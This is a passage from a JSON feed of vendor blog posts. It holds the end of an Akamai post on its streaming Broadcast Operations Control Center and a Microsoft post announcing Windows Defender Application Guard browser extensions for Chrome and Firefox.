bit-transfer time, bit-throughput\n * Mid-mile errors, cache hit-rate\n * Origin errors, content availability, throughput, DNS aspects\n * Hop efficiency, last hop/origin distance\n * Server availability, CPU/memory utilization, network aspects\n\nMetrics are gathered to allow slicing by a wide set of visibility dimensions including geography, network, server hosts/roles, player identity, device type/OS, video format, and beyond.\n\n### Tools and Solutions\n\nData is only as useful as the inference it provides. The BOCC has access to many tools that work on data and help get visibility into the location of the issues within the streaming workflow, the specific nature of the issues, and help explain why. The ability to perform root-cause analysis on an observation or issue and pin down the points of recovery is what enables the BOCC to be an effective stream monitoring and remediation operations service.\n\nMost of the BOCC tools are centered on data analytics. This happens **by formulating a set of hypotheses and then validating/eliminating them by data driven reasoning. **Here is a sample of the nature of the tools:\n\n * Client Assessment \n * How is a stream doing overall on KPI metrics? On the curve, or deviating?\n * For example, is startup time high or in check.\n * Impact Scoping \n * Is an observed issue localized to a geography/network/server/stream/ ... or spread widely?\n * If localized, where exactly? For example, which country or networks.\n * Casual Isolation \n * Ability to do one-vs-global, one-vs-other relative comparison for pinning cause.\n * For example, compare buffering for users across two networks, a network against global average.\n * Sampling Significance \n * Qualify observations with associated sample quantum; avoid mis-leading signals.\n * Attribute relevance by sample size before drawing inference.\n * Co-Relation across metrics from same/multiple data sources \n * Finding relative crests/troughs that confirm/invalidate a hypothesis.\n * For example, high buffering and lower user bandwidth going together might be indicative of last mile problems; player errors and time-synced origin errors could be indicative of content availability/encoding issues.\n * Linked Exploration and Analysis \n * For example, if users are buffering longer, figure out which edge servers they are connected to. If the increased rebuffering cannot be attributed to the edge servers, link forward to connected cache layer hierarchy, all the way to origin until a corelating signal emerges.\n * Change Vector Identification \n * Compare metric/dimensional spread between two time-windows to confirm if something changed, and if so, what?\n * For example, did a different server/stream come into play at hte time buffering was observed on last mile?\n\n### Timely Inference \n\nThe data and tools the BOCC has access to are wired to be time dependent. The BOCC has multiple contexts of use -\n\n * Real-time proactive monitoring of stream uptime and quality by way of alerts and eyes - over-glass charts\n * Real-time diagnosis and troubleshooting to root casue and fix noticed issues\n * Offline data mining for periodic and incremental improvements over status-quo\n\nGiven this, the data system and tools support:\n\n * Segmented data gathering for critical contexts - System/application specific like CPU/memory/bandwidth and transactional (like HTTP/REST interfaces)\n * Multiple data acquisition modes - Periodic aggregates, time specific snapshots, tables and events\n * Specialized systems of data \n * Alerting Engine - to continuously check for erroneous signals and call attention\n * Diagnostics Engine - to enable troubleshooting and associated tools\n * Mining Engine - to enable ad-hoc data exploration and inferencing \n * Relevance drive time-sensitivity \n * Latencies in seconds to minutes for alerting and diagnostics\n * Latencies in minutes to hours for offline exploration\n\nIn summary, the BOCC is supported and enabled by connected, specialized systems of data that are called to attention when needed and help act on concerns. The systems are built on a stack of Akamai custom big-data software, coupled with open source software like Kafka, Casandra, Presto, HDFS/Hadoop and Spark to drive data analytics. A detailed look at the systems themselves is for a future blog. For now, rest assured, one can trust streams to be safe under the watch of the BOCC.\n\n", "modified": "2019-05-23T18:54:40", "published": "2019-05-23T16:00:00", "id": "AKAMAIBLOG:60FE81B7CF2082196724730BBF0BF30A", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/oeRNrVQVsDA/broadcast-operations-control-center-bocc-enabling-ott-broadcast-operations.html", "type": "akamaiblog", "title": "Broadcast Operations Control Center (BOCC): Enabling OTT Broadcast Operations", "cvss": {"score": 0.0, "vector": "NONE"}}], "mssecure": [{"lastseen": "2019-05-23T20:31:14", "bulletinFamily": "blog", "description": "The hardware-based isolation technology on Windows 10 that allows Microsoft Edge to isolate browser-based attacks is now available as a browser extension for Google Chrome and Mozilla Firefox.\n\nWe [introduced the container technology](<https://blogs.windows.com/msedgedev/2016/09/27/application-guard-microsoft-edge/>) in 2017. Since then, we have been evolving the technology and engaging with customers to understand how hardware-based isolation can best help solve their security concerns. We know that many of our customers depend on multi-browser environments to allow enterprise apps to meet various compatibility requirements and enable productivity. And while modern browsers are continuously working to mitigate vulnerabilities, there are still exposures across these complex engines that can lead to irreversible and costly damages.\n\n\n\nTo provide customers with a comprehensive solution to isolate potential browser-based attacks, we have designed and developed Windows Defender Application Guard extensions, now generally available, to allow customers to integrate hardware-based isolation with Google Chrome and Mozilla Firefox.\n\n\n\n### How it works\n\nThe extensions for Google Chrome and Mozilla Firefox automatically redirect untrusted navigations to Windows Defender Application Guard for Microsoft Edge. The extension relies on a native application that we\u2019ve built to support the communication between the browser and the device\u2019s [Application Guard settings](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-guard/configure-wd-app-guard>).\n\nWhen users navigate to a site, the extension checks the URL against a list of enterprise sites defined by enterprise administrators. If the site is determined to be untrusted, the user is redirected to an isolated Microsoft Edge session. In the isolated Microsoft Edge session, the user can freely navigate to any site that has not been explicitly defined as enterprise-trusted by their organization without any risk to the rest of system. With our upcoming dynamic switching capability, if the user tries to go to an enterprise site while in an isolated Microsoft Edge session, the user is taken back to the default browser.\n\nTo configure the Application Guard extension under managed mode, enterprise administrators can follow these recommended steps:\n\n 1. Ensure devices [meet requirements](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-guard/reqs-wd-app-guard>).\n 2. [Turn on](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-guard/install-wd-app-guard#install-application-guard>) Windows Defender Application Guard.\n 3. Define the [network isolation settings](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-guard/configure-wd-app-guard#network-isolation-settings>) to ensure a set of enterprise sites is in place.\n 4. Install the new Windows Defender Application Guard companion application from the [Microsoft Store](<https://go.microsoft.com/fwlink/?linkid=2086033>).\n 5. Install the extension for [Google Chrome](<https://go.microsoft.com/fwlink/?linkid=2086034>) or [Mozilla Firefox](<https://go.microsoft.com/fwlink/?linkid=2086035>) browsers provided by Microsoft.\n 6. Restart the device.\n\n### Intuitive user experience\n\nWe designed the user interface to be transparent to users about Windows Defender Application Guard being installed on their devices and what it does. We want to ensure that users are fully aware that their untrusted navigations will be isolated and why.\n\n 1. When users initially open Google Chrome or Mozilla Firefox after the extension is deployed and configured properly, they will see a Windows Defender Application Guard landing page. \n 2. If there are any problems with the configuration, users will get instructions for resolving any configuration errors. \n 3. Users can initiate an Application Guard session without entering a URL or clicking on a link by clicking the extension icon on the menu bar of the browser.\n\n\n\n### Commitment to keep enterprise users and data safe\n\nHardware-based isolation is one of the innovations that enhance platform security on Windows 10. It is a critical component of the [attack surface reduction capabilities](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/overview-attack-surface-reduction>) in Microsoft Defender Advanced Threat Protection ([Microsoft Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)) and the broader unified security in [Microsoft Threat Protection](<https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Announcing-Microsoft-Threat-Protection/ba-p/262783>). With the new Application Guard extension for Google Chrome and Mozilla Firefox, customers can extend the security benefits of isolation in their environments and further reduce attack surface. Customers can confidently navigate the expansive internet with protection for enterprise and personal data.\n\nThe Windows Defender Application Guard extensions for Google Chrome and Mozilla Firefox are now available for Windows 10 Professional, Enterprise, and Education SKUs, version 1803 and later with latest updates.\n\n \n\n**_Rona Song_** \n_Windows platform security team_\n\n \n\n \n\n* * *\n\n### Talk to us\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft Defender ATP community](<https://techcommunity.microsoft.com/t5/Windows-Defender-Advanced-Threat/ct-p/WindowsDefenderAdvanced>).\n\nFollow us on Twitter [**@MsftSecIntel**](<https://twitter.com/MsftSecIntel>).\n\nThe post [New browser extensions for integrating Microsoft\u2019s hardware-based isolation](<https://www.microsoft.com/security/blog/2019/05/23/new-browser-extensions-for-integrating-microsofts-hardware-based-isolation/>) appeared first on [Microsoft Security.", "modified": "2019-05-23T15:50:07", "published": "2019-05-23T15:50:07", "id": "MSSECURE:98A5A2883E65DD628421A0C783DD2B64", "href": "https://www.microsoft.com/security/blog/2019/05/23/new-browser-extensions-for-integrating-microsofts-hardware-based-isolation/", "type": "mssecure", "title": "New browser extensions for integrating Microsoft\u2019s hardware-based isolation", "cvss": {"score": 0.0, "vector": "NONE"}}]}